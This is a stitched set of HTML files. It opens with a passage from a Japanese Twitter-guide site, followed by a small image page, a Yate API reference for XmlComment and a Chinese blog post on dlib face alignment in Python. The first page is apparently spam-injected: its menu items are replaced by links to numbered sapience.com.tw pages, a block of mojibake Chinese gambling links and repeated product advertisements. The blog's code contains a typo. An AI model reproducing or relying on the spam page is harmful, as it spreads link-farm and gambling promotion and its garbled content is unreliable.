class="small list-l lined"><a href="http://sapience.com.tw/logs/site-nipponki/02021646811.html">http://sapience.com.tw/logs/site-nipponki/02021646811.html</a></li> <li class="small list-l lined"><a href="" class="ranking"><span class="rank rank2">2</span>自分のツイートを削除するにはどうしたらいいですか?</a></li> <li class="small list-l lined"><a href="" class="ranking"><span class="rank rank3">3</span>ミニチェンジングプレイス プラス お布団付き 4WAY(パステルドット) サンデシカ 寝具?ねんね 組布団 持ち運び</a></li> </ol> </div> <div class="section-footer"> <a href="" class="link-more">もっと知りたい!「Twitter使い方ガイド」</a> </div> </section> </div> </div> <aside class="column sub"> <section id="twinavi-tweet" class="section"> <h1 class="section-title small">最新のツイナビツイート</h1> <div class="section-body"> <p class="small">【話題のツイート】私が「♪お手〜伝いロボ♪ 緊急出動〜♪」って歌えば、子供達は… <a rel="nofollow" target="_blank" href="">【レビューを書いて2,200円引き!】anthem Mirror収納 雑誌収納一体型ミラーアンセム シリーズレトロ 市場株式会社 ANM-2398BR</a></p> </div> <div class="follow_sidebar follow_twitter"> <span class="altimg hukidashi"></span> <div class="column"> <a href="" title="ツイナビのTwitterアカウント" class="altimg icon m ic-twinavi">純正ショルダーストラップ付【送料・代引無料!】カルパット RZ-240 (エアーブラック/BK) <</a> </div> <div class="giftext icon-m"> <a href="" title="ツイナビのTwitterアカウント" class="small">Twitterの最新情報をチェックしよう!</a> <a href="https://twitter.com/" class="twitter-follow-button" data-show-count="false" data-lang="ja" data-show-screen-name="true">をフォロー</a> </div> <div class="clearfix"></div> </div> </section> <section id="facebook" class="section"> <p class="small">Facebook<a href="http://www.xpj3344111.com/">ÐÂÆÏ¾©ÓéÀÖ</a> <a href="http://www.zq3344111.com/">ÕæÇ®Å£Å£</a> <a href="http://www.ylc3344111.com/">ÓéÀÖ³Ç</a> <a href="http://www.xy28tu.com/">pcµ°µ°×ßÊÆÍ¼</a> <a href="http://www.pcrgs.com/">pcµ°µ°ÔÚÏßÔ¤²âÍø</a> <a href="http://www.nin168.com/">pcµ°µ°ÐÒÔË28app</a> <a href="http://www.xinjiapo28app.com/">ÐÂ¼ÓÆÂÐÒÔË28app</a> <a href="http://www.jianada28app.com/">¼ÓÄôóÐÒÔË28</a> <a href="http://www.kuai28.com/">ÐÒÔË28¼¼ÇÉ</a> <a href="http://www.pcdd-app.com/">pcµ°µ°ÐÒÔË28app</a> <a href="http://www.xy28xiazai.com/">pcµ°µ°×ßÊÆÍ¼</a> <a href="http://www.8883344111.com/">888ÕæÈËÓéÀÖ</a> <a href="http://www.uni588.com/web/zhongbanghaotie/25562.html">È«Ñ¶Íø</a> <a href="http://www.uni588.com/web/zhongbanghaotie/25563.html">ÕæÈËţţ</a> <a href="http://www.yl3344111.com/">ÓÀÀûÓéÀÖ</a> <a href="http://www.qx3344111.com/">È«Ñ¶Íø</a> <a href="http://www.zr3344111.com/">888ÕæÈËÓéÀÖ</a> <a href="http://www.xy28uu.com/">xy28Ô¤²â</a></p> <div class="follow_fb"><div id="fb-root"></div><div class="fb-like" data-href="https://www.facebook.com/" data-send="false" data-layout="button_count" data-width="55" data-show-faces="false"></div></div> </section> <section id="home-side-account" class="section"> <h1 class="section-title small sub"><a href="">有名アカウントを探す</a></h1> <div class="section-body-sub"> <ul> <li> <a href="" class="lined all block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/645312064815128576/v_uMNqPs_bigger.jpg" alt="GACKT" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> 総合<br /> <span class="num mute xsmall">71,071人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/645312064815128576/v_uMNqPs_bigger.jpg" alt="GACKT" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> 有名人・芸能人<br /> <span class="num mute xsmall">2,867人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/680394216774619138/6MmJRmsb_bigger.jpg" alt="タワーレコード川崎店(通称:タワ崎)" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> エンタメ<br /> <span class="num mute xsmall">3,226人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> <span style="letter-spacing:-2px">くらし・おでかけ</span><br /> <span class="num mute xsmall">6,128人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/609171843761594368/oBhlek1O_bigger.png" alt="ショップジャパン【公式】" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> メディア<br /> <span class="num mute xsmall">車</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/428453450527940609/6BmKmb99_bigger.jpeg" alt="旭川市旭山動物園[公式]" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> 社会・政治<br /> <span class="num mute xsmall">886人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/1245987829/tokoro_san_bigger.jpg" alt="所英男" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> スポーツ<br /> <span class="num mute xsmall">1,080人</span> </span> </a> </li> <li> <a href="" class="lined last block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/666407537084796928/YBGgi9BO_bigger.png" alt="Twitter" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> ビジネス・経済<br /> <span class="num mute xsmall">Wii Uソフト</span> </span> </a> </li> <li> <a href="" class="lined last block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> サービス<br /> <span class="num mute xsmall">3,871人</span> </span> </a> </li> </ul> <div class="clearfix"></div> </div> </section> <section class="section"> <h1 class="section-title small sub"><a href="">ツイッター使い方ガイド</a></h1> <div class="section-body-sub"> <ul> <li class="small dotted lined"><a href="http://sapience.com.tw/logs/site-nipponki/02021648181.html">http://sapience.com.tw/logs/site-nipponki/02021648181.html</a></li> <li class="small dotted lined"><a href="">基本的な使い方</a></li> <li class="small dotted lined"><a href="http://sapience.com.tw/logs/site-nipponki/02021640182.html">http://sapience.com.tw/logs/site-nipponki/02021640182.html</a></li> <li class="small dotted lined"><a href="">FAQ よくある質問</a></li> <li class="small dotted lined last" last><a href="">Wii U アクション</a></li> </ul> </div> </section> <div class="section section-fbwidget"> <div class="section-title small sub">Facebook</div> <div class="fb-like-box" data-href="http://www.facebook.com/" data-width="292" data-height="255" data-colorscheme="light" data-show-faces="true" data-header="false" data-stream="false" data-show-border="false">純正ショルダーストラップ付【送料・代引無料!】カルパット RZ-240 (エアーブラック/BK) </div> </div> </aside> <div class="clearfix"></div> <nav class="contents"> <br /> <a href="" class="link-top absright">ページの上部へ</a> </nav> </div> <footer id="pagefooter" class="wrapper"> <div class="contents"> <nav> <ul id="sitemap"> <li class="sitemap-block"><span class="top-sitemap"><a href="" class="servicename ti-topics">話題</a></span> <ul> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021645822.html">http://sapience.com.tw/logs/site-nipponki/02021645822.html</a></li> <li><a href="">ニュース</a></li> <li><a href="">Hoppetta(ホッペッタ) 寝具</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021639635.html">http://sapience.com.tw/logs/site-nipponki/02021639635.html</a></li> <li><a href="">エンタメ</a></li> <li><a href="">IT</a></li> <li><a href="">カルチャー</a></li> <li><a href="">純正ショルダーストラップ付【送料・代引無料!】カルパット RZ-240 (エアーブラック/BK) </a></li> <li><a href="">お知らせ</a></li> </ul> <br class="block clearfix"><br> <span class="top-sitemap"><a href="" class="servicename ti-matome">まとめ</a></span> <ul> <li><a href="http://twinavi.jp/matome/category/%E3%82%B3%E3%83%9F%E3%83%83%E3%82%AF%E3%83%BB%E3%82%A2%E3%83%8B%E3%83%A1">コミック・アニメ</a></li> <li><a href="http://twinavi.jp/matome/category/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a></li> <li><a href="">映画</a></li> <li><a href="" class="div-inner small on">TV番組</a></li> <li><a href="">芸能(海外)</a></li> <li><a href="http://twinavi.jp/matome/category/%E8%8A%B8%E8%83%BD%EF%BC%88%E5%9B%BD%E5%86%85%EF%BC%89">芸能(国内)</a></li> <li><a href="http://twinavi.jp/matome/category/%E3%83%97%E3%83%AD%E9%87%8E%E7%90%83">プロ野球</a></li> <li><a href="">Jリーグ</a></li> <li><a href="">ヘリコプター</a></li> <li><a href="http://twinavi.jp/matome/category/%E3%82%AC%E3%82%B8%E3%82%A7%E3%83%83%E3%83%88">ガジェット</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021641940.html">http://sapience.com.tw/logs/site-nipponki/02021641940.html</a></li> <li><a href="">22インチ自転車</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021637612.html">http://sapience.com.tw/logs/site-nipponki/02021637612.html</a></li> <li><a href="">IT</a></li> <li><a href="http://twinavi.jp/matome/category/%E9%9F%B3%E6%A5%BD">音楽</a></li> <li><a href="">純正ショルダーストラップ付【送料・代引無料!】カルパット RZ-240 (エアーブラック/BK) </a></li> <li><a href="">社会</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021642034.html">http://sapience.com.tw/logs/site-nipponki/02021642034.html</a></li> </ul> <br class="block clearfix"><br> </li> <li class="sitemap-block"> <span class="top-sitemap"><a href="http://sapience.com.tw/logs/site-nipponki/02021646094.html">http://sapience.com.tw/logs/site-nipponki/02021646094.html</a></span> <ul> <li><a href="">インタビュー 一覧</a></li> </ul> <br class="block clearfix"><br> <span class="top-sitemap"><a href="" class="servicename ti-account">Twitter</a></span> <ul> <li><a href="./index.html">総合</a></li> <li><a href="http://twinavi.jp/account/list/%E6%9C%89%E5%90%8D%E4%BA%BA%E3%83%BB%E8%8A%B8%E8%83%BD%E4%BA%BA">有名人・芸能人</a></li> <li><a href="">エンタメ</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021641184.html">http://sapience.com.tw/logs/site-nipponki/02021641184.html</a></li> <li><a href="">メディア</a></li> <li><a href="http://twinavi.jp/account/list/%E3%83%93%E3%82%B8%E3%83%8D%E3%82%B9%E3%83%BB%E7%B5%8C%E6%B8%88">ビジネス・経済</a></li> <li><a href="">純正ショルダーストラップ付【送料・代引無料!】カルパット RZ-240 (エアーブラック/BK) </a></li> <li><a href="">スポーツ</a></li> <li><a href="">サービス</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021642681.html">http://sapience.com.tw/logs/site-nipponki/02021642681.html</a></li> </ul> <br class="block clearfix"><br> <span class="top-sitemap"><a href="" class="servicename ti-topics">特別企画</a></span> <ul> <li class="clearfix"><a href="">アンケート</a></li> <li><a href="">選挙</a></li> </ul> </li> <li class="sitemap-block"><span class="top-sitemap"><a href="" class="servicename ti-guide">Twitter使い方ガイド</a></span> <ul> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021646460.html">http://sapience.com.tw/logs/site-nipponki/02021646460.html</a></li> <li><a href="">Twitterとは</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021640240.html">http://sapience.com.tw/logs/site-nipponki/02021640240.html</a></li> <li><a href="">純正ショルダーストラップ付【送料・代引無料!】カルパット RZ-240 (エアーブラック/BK) </a></li> <li><a href="">よくある質問</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021645780.html">http://sapience.com.tw/logs/site-nipponki/02021645780.html</a></li> </ul> <br class="block clearfix"><br> <span class="top-sitemap"><a href="" class="servicename ti-twitter">ツイッター検索</a></span> <ul> <li><a href="">キーワード検索</a></li> <li><a href="">ユーザー会話検索</a></li> </ul> <br class="block clearfix"><br> <span class="top-sitemap"><a href="" class="servicename ti-help">ツイナビヘルプ</a></span> <ul> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021645685.html">http://sapience.com.tw/logs/site-nipponki/02021645685.html</a></li> <li><a href="">よくある質問</a></li> </ul> </li> </ul> </nav> <div class="clearfix"></div> </div> <div id="footer-giftext"> <div class="contents"> <!-- giftext --> <div class="column footer-giftext"> <div class="column"> <a href="http://sapience.com.tw/logs/site-nipponki/02021649013.html">http://sapience.com.tw/logs/site-nipponki/02021649013.html</a> </div> <div class="giftext icon-m"> <span class="subtitle">ツイナビ公式Twitter</span> <a href="" class="twitter-follow-button" data-show-count="false" data-lang="ja" data-show-screen-name="false">プログラム電動ウォーカー YMT-189ï¼· ヤマトヒューマン ライフスタイル 健康器具 ルームランナー</a> </div> </div> <div class="column footer-giftext"> <div class="column"> <a href="https://www.facebook.com/" target="_blank" class="altimg icon m ic-facebook">facebook</a> </div> <div class="giftext icon-m"> <span class="subtitle">ツイナビ公式Facebook</span> <div id="fb-root"></div><div class="fb-like" data-href="https://www.facebook.com/" data-send="false" data-layout="button_count" data-width="200" data-show-faces="false">純正ショルダーストラップ付【送料・代引無料!】カルパット RZ-240 (エアーブラック/BK) </div> </div> </div> <div class="column footer-giftext twinavismart"> <div class="column"> <a href="" class="altimg icon m ic-twinavismart">ツイナビforスマートフォン</a> </div> <div class="giftext icon-m"> <span class="subtitle"><a href="">ツイナビforスマートフォン</a></span> <span class="xsmall"><a href="">スマートフォンでアクセス!</a></span> </div> </div> <!-- //giftext --> <div class="clearfix"></div> </div> </div> <div class="contents last"> <ul id="docs" class="centered xsmall"> <li><a href="">ツイナビ ホーム</a></li> <li><a href="">利用規約</a></li> <li><a href="http://www.garage.co.jp/corporate/policy/index.html" target="_blank">個人情報保護方針</a></li> <li><a href="">健全化に関する指針</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021643438.html">http://sapience.com.tw/logs/site-nipponki/02021643438.html</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021634504.html">http://sapience.com.tw/logs/site-nipponki/02021634504.html</a></li> <li><a href="">広告掲載について</a></li> <li class="last"><a href="">お問い合わせ</a> </ul> <p class="centered xsmall"><small>Copyright &copy; 2016 All rights reserved.</small></p> </div> </footer> <div class="hide"> <div id="preregister-box"> <p class="preregister-title large">純正ショルダーストラップ付【送料・代引無料!】カルパット RZ-240 (エアーブラック/BK) </p> <p class="preregister-text">その他ラジコン<br/>ラクーナ 2015年モデル + コランCTS<首すわりから使えるタイプ> セットアップリカ ベビーカー,純正ショルダーストラップ付【送料・代引無料!】カルパット RZ-240 (エアーブラック/BK) </p> <p><a href="" class="btn login preregister-login">Twitterでの認証に進む</a></p> </div> </div> </body> </html>
bin-debug/srcview/source/assets/images/icons/Icons-24.png.html
ibamacsr/HexGIS-Flex
<!-- saved from url=(0014)about:internet --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>Icons-24.png</title> </head> <body> <img src="Icons-24.png" border="0"/> </body> </html>
docs/api/TelEngine__XmlComment.html
cvsuser-chromium/yate
<HTML> <HEAD> <TITLE>class XmlComment</TITLE> <META NAME="Generator" CONTENT="KDOC "> </HEAD> <BODY bgcolor="#ffffff" text="#000000" link="#0000ff" vlink="#000099" alink= "#ffffff"> <TABLE WIDTH="100%" BORDER="0"> <TR> <TD> <TABLE BORDER="0"> <TR><TD valign="top" align="left" cellspacing="10"> <h1>class XmlComment</h1> </TD> <TD valign="top" align="right" colspan="1">Xml Comment. <small><A HREF="#longdesc">More...</A></small></TD></TR> </TABLE> <HR> <TABLE BORDER="0"> <TR><TH>Full name</TH><TD><code><A HREF="TelEngine.html">TelEngine</A>::XmlComment</code></TD></TR> <TR><TH>Definition</TH><TD><code>#include &lt;<A HREF="yatexml_h.html">yatexml.h</A>&gt;</code></TD></TR> <TR><TH>Inherits</TH><TD><A HREF="TelEngine__XmlChild.html">TelEngine::XmlChild</A> <small>[public ]</small></TD></TR> <TR><TH><A HREF="full-list-TelEngine__XmlComment.html">List of all Methods</A></TH></TR> </TABLE> </TD> <TD align="right"><TABLE BORDER="0"><TR><TD><small><A HREF="index-long.html">Annotated List</A></small></TD></TR> <TR><TD><small><A HREF="header-list.html">Files</A></small></TD></TR> <TR><TD><small><A HREF="all-globals.html">Globals</A></small></TD></TR> <TR><TD><small><A HREF="hier.html">Hierarchy</A></small></TD></TR> <TR><TD><small><A HREF="index.html">Index</A></small></TD></TR> </TABLE></TD></TR></TABLE> <h4>Public Methods</h4><ul><LI>&nbsp;<b><A HREF="#ref1">XmlComment</A></b> (const String& comm) </LI> <LI>&nbsp;<b><A HREF="#ref2">XmlComment</A></b> (const XmlComment& orig) </LI> <LI>virtual &nbsp;<b><A HREF="#ref3">~XmlComment</A></b> () </LI> <LI>inline const String& &nbsp;<b><A HREF="#ref4">getComment</A></b> () const </LI> <LI>void &nbsp;<b><A HREF="#ref5">toString</A></b> (String& dump, const String& indent = String::empty()) const </LI> <LI>virtual XmlComment* &nbsp;<b><A HREF="#ref6">xmlComment</A></b> () </LI> </ul><HR><H2><A NAME="longdesc">Detailed Description</A></H2><p> A Xml Comment from Xml document </p> <A NAME="XmlComment"></A><A NAME="ref1"></A><table width="100%"><tr bgcolor="#eeeeee"><td>&nbsp;<strong>XmlComment</strong> (const String& comm) <br></td><td align="right"><h3><strong>XmlComment</strong></h3></td></tr></table><p></p><p> Constructor </p> <p><b>Parameters</b>:<TABLE BORDER="0" CELLPADDING="5"> <TR><TD align="left" valign="top"><i>comm</i></TD><TD align="left" valign="top">The comment content </TD></TR> </TABLE></P> <A NAME="XmlComment"></A><A NAME="ref2"></A><table width="100%"><tr bgcolor="#eeeeee"><td>&nbsp;<strong>XmlComment</strong> (const XmlComment& orig) <br></td><td align="right"><h3><strong>XmlComment</strong></h3></td></tr></table><p></p><p> Copy constructor </p> <p><b>Parameters</b>:<TABLE BORDER="0" CELLPADDING="5"> <TR><TD align="left" valign="top"><i>orig</i></TD><TD align="left" valign="top">Original XmlComment </TD></TR> </TABLE></P> <A NAME="~XmlComment"></A><A NAME="ref3"></A><table width="100%"><tr bgcolor="#eeeeee"><td> &nbsp;<strong>~XmlComment</strong> () <br></td><td align="right"><h3><strong>~XmlComment</strong></h3></td></tr></table><p> <small>[virtual]</small></p><p> Destructor </p> <A NAME="getComment"></A><A NAME="ref4"></A><table width="100%"><tr bgcolor="#eeeeee"><td>inline const String& &nbsp;<strong>getComment</strong> () <br></td><td align="right"><h3><strong>getComment</strong></h3></td></tr></table><p> <small>[const]</small></p><p> Get the text contained by this comment </p> <p><b>Returns</b>: The comment </p> <A NAME="toString"></A><A NAME="ref5"></A><table width="100%"><tr bgcolor="#eeeeee"><td>void &nbsp;<strong>toString</strong> (String& dump, const String& indent = String::empty()) <br></td><td align="right"><h3><strong>toString</strong></h3></td></tr></table><p> <small>[const]</small></p><p> Build a String from this XmlComment </p> <p><b>Parameters</b>:<TABLE BORDER="0" CELLPADDING="5"> <TR><TD align="left" valign="top"><i>dump</i></TD><TD align="left" valign="top">The string where to append representation </TD></TR> <TR><TD align="left" valign="top"><i>indent</i></TD><TD align="left" valign="top">Spaces for output </TD></TR> </TABLE></P> <p>Reimplemented from <A HREF="TelEngine__GenObject.html#toString">GenObject</A>.</p> <A NAME="xmlComment"></A><A NAME="ref6"></A><table width="100%"><tr bgcolor="#eeeeee"><td> XmlComment* &nbsp;<strong>xmlComment</strong> () <br></td><td align="right"><h3><strong>xmlComment</strong></h3></td></tr></table><p> <small>[virtual]</small></p><p> Get the Xml comment </p> <p><b>Returns</b>: This object </p> <p>Reimplemented from <A HREF="TelEngine__XmlChild.html#xmlComment">XmlChild</A>.</p> <HR> <table> <tr><td><small>Generated by: paulc on bussard on Thu Jul 24 18:41:02 2014, using kdoc 2.0a54.</small></td></tr> </table> </BODY> </HTML>
articles/2015/dlib to face align using python.html
HonkeeChan/honkeechan.github.io
<!DOCTYPE html> <html lang="zh" > <head> <title>dlib to face align using python - Honkee</title> <!-- Using the latest rendering mode for IE --> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="canonical" href="http://honkeechan.github.io/articles/2015/dlib to face align using python.html"> <meta name="author" content="honkee" /> <meta name="keywords" content="python,dlib,face align" /> <meta name="description" content="人脸特征点检测 predictor_path = &#39;path/to/shape_predictor_68_face_landmarks.dat&#39; img = &#39;the/face/you/want/to/predict&#39; detector = dlib.get_frontal_face_detector() predictor = dlib.shape_predictor(predictor_path ..." /> <meta property="og:site_name" content="Honkee" /> <meta property="og:type" content="article"/> <meta property="og:title" content="dlib to face align using python"/> <meta property="og:url" content="http://honkeechan.github.io/articles/2015/dlib to face align using python.html"/> <meta property="og:description" content="人脸特征点检测 predictor_path = &#39;path/to/shape_predictor_68_face_landmarks.dat&#39; img = &#39;the/face/you/want/to/predict&#39; detector = dlib.get_frontal_face_detector() predictor = dlib.shape_predictor(predictor_path ..."/> <meta property="article:published_time" content="2015-10-27" /> <meta property="article:section" content="Blog" /> <meta property="article:tag" content="python" /> <meta property="article:tag" content="dlib" /> <meta property="article:tag" content="face align" /> <meta property="article:author" content="honkee" /> <!-- Bootstrap --> <link rel="stylesheet" href="http://honkeechan.github.io/theme/css/bootstrap.min.css" type="text/css"/> <link href="http://honkeechan.github.io/theme/css/font-awesome.min.css" rel="stylesheet"> <link href="http://honkeechan.github.io/theme/css/pygments/native.css" rel="stylesheet"> <link rel="stylesheet" href="http://honkeechan.github.io/theme/css/style.css" type="text/css"/> </head> <body> <div class="navbar navbar-default navbar-fixed-top" role="navigation"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a href="http://honkeechan.github.io/" class="navbar-brand"> Honkee </a> </div> <div class="collapse navbar-collapse navbar-ex1-collapse"> <ul class="nav navbar-nav"> <li class="active"> <a href="http://honkeechan.github.io/category/blog.html">Blog</a> </li> <li > <a href="http://honkeechan.github.io/category/diary.html">Diary</a> </li> </ul> <ul class="nav navbar-nav navbar-right"> <li><a href="http://honkeechan.github.io/archives.html"><i class="fa fa-th-list"></i><span class="icon-label">Archives</span></a></li> </ul> </div> <!-- /.navbar-collapse --> </div> </div> <!-- /.navbar --> <!-- Banner --> <!-- End Banner --> <div class="container"> <div class="row"> <div class="col-sm-9"> <section id="content"> <article> <header class="page-header"> <h1> <a href="http://honkeechan.github.io/articles/2015/dlib to face align using python.html" rel="bookmark" title="Permalink to dlib to face align using python"> dlib to face align using python </a> </h1> </header> <div class="entry-content"> <div class="panel"> <div class="panel-body"> <footer class="post-info"> <span class="label label-default">Date</span> <span class="published"> <i class="fa fa-calendar"></i><time datetime="2015-10-27T00:00:00+08:00"> 二 27 十月 2015</time> </span> <span class="label label-default">Tags</span> <a href="http://honkeechan.github.io/tag/python.html">python</a> / <a href="http://honkeechan.github.io/tag/dlib.html">dlib</a> / <a href="http://honkeechan.github.io/tag/face-align.html">face align</a> </footer><!-- /.post-info --> </div> </div> <h2>人脸特征点检测</h2> <div class="highlight"><pre><span class="n">predictor_path</span> <span class="o">=</span> <span class="s">&#39;path/to/shape_predictor_68_face_landmarks.dat&#39;</span> <span class="n">img</span> <span class="o">=</span> <span class="s">&#39;the/face/you/want/to/predict&#39;</span> <span class="n">detector</span> <span class="o">=</span> <span class="n">dlib</span><span class="o">.</span><span class="n">get_frontal_face_detector</span><span class="p">()</span> <span class="n">predictor</span> <span class="o">=</span> <span class="n">dlib</span><span class="o">.</span><span class="n">shape_predictor</span><span class="p">(</span><span class="n">predictor_path</span><span class="p">)</span> <span class="n">dets</span> <span class="o">=</span> <span class="n">detector</span><span class="p">(</span><span class="n">img</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="n">shape</span> <span class="o">=</span> <span class="n">predictor</span><span class="p">(</span><span class="n">img</span><span class="p">,</span> <span class="n">d</span><span class="p">)</span> </pre></div> <blockquote> <p>get_frontal_face_detector</p> </blockquote> <p>detector返回的dets是识别出人脸区域对应的矩形。 第二个参数1,表示将图片放大(upsample)1倍,这是为了使图片中的东西更大,更利于我们检测人脸</p> <blockquote> <p>shape_predictor</p> </blockquote> <p>predictor的输入参数d是代表从d这个矩形范围内找landmark。 predictor返回的shape就是检测出的68个特征点(face_landmarks),我们可以调用shape.part(0) ... shape.part(67)得到每一个特征点对应的坐标。</p> <h2>Affine Transform</h2> <p><img alt="" src="/images/Affine_Transform_Matrix.png" /> <img alt="" src="/images/Warp_Affine_Tutorial_Theory.jpg" /> 通过函数getAffineTransform得到A状态到B状态的转换矩阵 再调用warpAffine将图片做Affine Transform.</p> <div class="highlight"><pre><span class="n">statusA</span> <span class="o">=</span> <span class="p">[(</span><span class="n">beforeA</span><span class="o">.</span><span class="n">x</span><span class="p">,</span> <span class="n">beforeA</span><span class="o">.</span><span class="n">y</span><span class="p">),(</span><span class="n">beforeB</span><span class="o">.</span><span class="n">x</span><span class="p">,</span> <span class="n">beforeB</span><span class="o">.</span><span class="n">y</span><span class="p">),(</span><span class="n">beforeC</span><span class="o">.</span><span class="n">x</span><span class="p">,</span> <span class="n">beforeC</span><span class="o">.</span><span class="n">y</span><span class="p">)]</span> <span class="n">statusB</span> <span class="o">=</span> <span class="p">[(</span><span class="n">afterA</span><span class="o">.</span><span class="n">x</span><span class="p">,</span> <span class="n">afterA</span><span class="o">.</span><span class="n">y</span><span class="p">),(</span><span class="n">afterB</span><span class="o">.</span><span class="n">x</span><span class="p">,</span><span class="n">afterB</span><span class="o">.</span><span class="n">y</span><span class="p">),(</span><span class="n">afterC</span><span class="o">.</span><span class="n">x</span><span class="p">,</span> <span class="n">afterC</span><span class="o">.</span><span class="n">y</span><span class="p">)]</span> <span class="n">H</span> <span class="o">=</span> <span class="n">cv2</span><span class="o">.</span><span class="n">getAffineTransform</span><span class="p">(</span><span class="n">stautsA</span><span class="p">,</span> <span class="n">stautsB</span><span class="p">)</span> <span class="n">warpedImg</span> <span class="o">=</span> <span class="n">cv2</span><span class="o">.</span><span class="n">warpAffine</span><span class="p">(</span><span class="n">img</span><span class="p">,</span> <span class="n">H</span><span class="p">,</span> <span class="n">np</span><span class="o">.</span><span class="n">shape</span><span class="p">(</span><span class="n">img</span><span class="p">)[</span><span class="mi">0</span><span class="p">:</span><span class="mi">2</span><span class="p">])</span> </pre></div> <p>还有<code>cv2.getRotationMatrix2D(center, angle, scale)</code>是得到一个旋转angle度的Affine Transform Matrix。</p> <h2>openface的face align</h2> <p>Github上有一个实现FaceNet的开源代码openface,它是先face align,然后用对齐后的人脸输入FaceNet得到特征,然后求其欧式距离得到两张图片的差异。 其中人脸对齐部分代码的思想是:<br> 1.得到face landmark<br> 2.将眼睛,鼻尖这三点通过Affine Transform映射到三个点,然后对整张图片进行Affine Transform.<br> 3.再计算face landmark,求face landmark的所有点的外接矩形为裁剪后的对齐人脸。<br></p> </div> <!-- /.entry-content --> <hr/> <section class="comments" id="comments"> <h2>Comments</h2> <div id="disqus_thread"></div> <script type="text/javascript"> /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */ var disqus_shortname = 'honkeechan'; // required: replace example with your forum shortname var disqus_identifier = 'dlib to face align using python'; var disqus_url = 'http://honkeechan.github.io/articles/2015/dlib to face align using python.html'; var disqus_config = function () { this.language = "zh"; }; /* * * DON'T EDIT BELOW THIS LINE * * */ (function () { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })(); </script> <noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript> <a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a> </section> </article> </section> </div> <div class="col-sm-3" id="sidebar"> <aside> <section class="well well-sm"> <ul class="list-group list-group-flush"> <li class="list-group-item"><h4><i class="fa fa-home fa-lg"></i><span class="icon-label">Social</span></h4> <ul class="list-group" id="social"> <li class="list-group-item"><a href="#"><i class="fa fa-you-can-add-links-in-your-config-file-square fa-lg"></i> You can add links in your config file</a></li> <li class="list-group-item"><a href="#"><i class="fa fa-another-social-link-square fa-lg"></i> Another social link</a></li> </ul> </li> <li class="list-group-item"><a href="http://honkeechan.github.io/"><h4><i class="fa fa-tags fa-lg"></i><span class="icon-label">Tags</span></h4></a> <ul class="list-group " id="tags"> </ul> </li> <li class="list-group-item"><h4><i class="fa fa-external-link-square fa-lg"></i><span class="icon-label">Links</span></h4> <ul class="list-group" id="links"> <li class="list-group-item"> <a href="http://blog.csdn.net/honkee_" target="_blank"> CSDN </a> </li> <li class="list-group-item"> <a href="http://python.org/" target="_blank"> Python.org </a> </li> <li class="list-group-item"> <a href="http://jinja.pocoo.org/" target="_blank"> Jinja2 </a> </li> <li class="list-group-item"> <a href="#" target="_blank"> You can modify those links in your config file </a> </li> </ul> </li> </ul> </section> </aside> </div> </div> </div> <footer> <div class="container"> <hr> <div class="row"> <div class="col-xs-10">&copy; 2015 honkee &middot; Powered by <a href="https://github.com/DandyDev/pelican-bootstrap3" target="_blank">pelican-bootstrap3</a>, 